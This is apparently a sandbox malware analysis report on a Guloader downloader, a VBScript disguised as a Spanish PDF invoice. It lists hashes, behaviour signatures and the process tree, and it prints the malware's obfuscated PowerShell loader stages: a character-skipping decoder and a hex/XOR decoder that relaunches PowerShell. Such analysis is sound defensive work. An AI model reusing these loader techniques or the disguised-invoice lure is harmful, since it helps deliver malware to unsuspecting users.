Analysis
- max time kernel: 369s
- max time network: 507s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30-01-2023 12:21
Static task: static1
Behavioral task: behavioral1
- Sample: Facturas Pagadas al Vencimiento.PDF.vbs
- Resource: win7-20220901-en
Behavioral task: behavioral2
- Sample: Facturas Pagadas al Vencimiento.PDF.vbs
- Resource: win10v2004-20221111-en
General
- Target: Facturas Pagadas al Vencimiento.PDF.vbs
- Size: 330KB
- MD5: ed0e0f21f05f2cb8532be52cc4662e68
- SHA1: e1e82fbd824112be8a18053a4c7475b78d64806c
- SHA256: 02912e9095dd8683352dee911328ba880510bc366bf9d4a7a56355328b49e2a4
- SHA512: 32286c555502e5eff6b0fa84d3f5de4953549bf253709deb535682817d4418fb9e7f6513686b42febe58238bbdbc52d604e559c32aeeefd7419f6accd12bf9ec
- SSDEEP: 6144:ryK21aGtlv9NMLTReDutfjc6314t7ByaqOH9YNodCcmyvviq:rt2AclYkulIg12BT9Eo2Od
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Blocklisted process makes network request (1 IoCs)
  Processes: WScript.exe
  flow | pid | process
  1 | 3368 | WScript.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: WScript.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | WScript.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  3740 | powershell.exe
  3740 | powershell.exe
  4924 | powershell.exe
  4924 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: powershell.exe, powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 3740 | powershell.exe
  Token: SeDebugPrivilege | 4924 | powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: WScript.exe, powershell.exe
  description | pid | process | target process
  PID 3368 wrote to memory of 3740 | 3368 | WScript.exe | powershell.exe
  PID 3368 wrote to memory of 3740 | 3368 | WScript.exe | powershell.exe
  PID 3740 wrote to memory of 4924 | 3740 | powershell.exe | powershell.exe
  PID 3740 wrote to memory of 4924 | 3740 | powershell.exe | powershell.exe
  PID 3740 wrote to memory of 4924 | 3740 | powershell.exe | powershell.exe
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ Facturas Pagadas al Vencimiento.PDF.vbs" 1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Saliant = """[obfuscated payload string]""";;Function Servitorial9 { param([String]$Toeres); For($Inseratet=2; $Inseratet -lt $Toeres.Length-1; $Inseratet+=(2+1)){ $Gyropilot = $Gyropilot + $Toeres.Substring($Inseratet, 1); } $Gyropilot;}$Stafettens0 = Servitorial9 'By Be Ku Ar Bl Sp Br Da Ec Du Te Bo Su Ph Bo Af Fl Ku Ko Te In St Ex StITrEGlXAb ';$Stafettens1= Servitorial9 $Saliant;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Stafettens1 ;}else{.$Stafettens0 $Stafettens1;}" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Gyropilot0 { param([String]$Toeres); $Metropolitanizes = New-Object byte[] ($Toeres.Length / 2); For($Inseratet=0; $Inseratet -lt $Toeres.Length; $Inseratet+=2){ $Tallote = $Toeres.Substring($Inseratet, 2); $Metropolitanizes[$Inseratet/2] = [convert]::ToByte($Tallote, 16); $Metropolitanizes[$Inseratet/2] = ($Metropolitanizes[$Inseratet/2] -bxor 240); } [String][System.Text.Encoding]::ASCII.GetString($Metropolitanizes);}[script continues: hex-encoded strings passed to Gyropilot0];$Minimumtrykket00='HKCU:\Omkarterende\Naphthalised';[script continues: hex-encoded strings passed to Gyropilot0]#" 3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads